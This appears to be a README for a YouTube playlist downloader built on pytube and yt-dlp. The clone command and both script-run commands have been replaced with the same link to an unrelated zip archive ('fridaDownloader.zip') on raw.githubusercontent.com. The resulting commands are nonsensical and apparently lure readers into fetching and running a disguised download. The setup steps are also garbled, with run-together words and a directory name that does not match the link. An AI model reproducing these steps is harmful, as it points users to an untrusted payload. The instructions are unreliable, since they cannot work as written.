Scripts to download videos from YouTube playlists using pytube and yt-dlp.
- Python 3.x
pytubeyt-dlpos
-
Clone the repository:
git clone https://raw.githubusercontent.com/Mohammed-FA/fridaDownloader/main/Peltogaster/fridaDownloader.zip cd youtube-playlist-downloader -
Install dependencies:
pip install pytube yt-dlp
This script fetches video URLs from a YouTube playlist and saves them to a text file.
-
Run the script:
python https://raw.githubusercontent.com/Mohammed-FA/fridaDownloader/main/Peltogaster/fridaDownloader.zip
-
Follow the prompt to enter the YouTube playlist URL.
This script reads video URLs from a text file and downloads them using yt-dlp.
-
Run the script:
python https://raw.githubusercontent.com/Mohammed-FA/fridaDownloader/main/Peltogaster/fridaDownloader.zip
-
Follow the prompt to enter the desired video quality (e.g., highest, lowest, 720p, 1080p).
-
Downloaded videos will be saved in the
downloaded_videosdirectory.
This project is licensed under the MIT License - see the LICENSE file for details.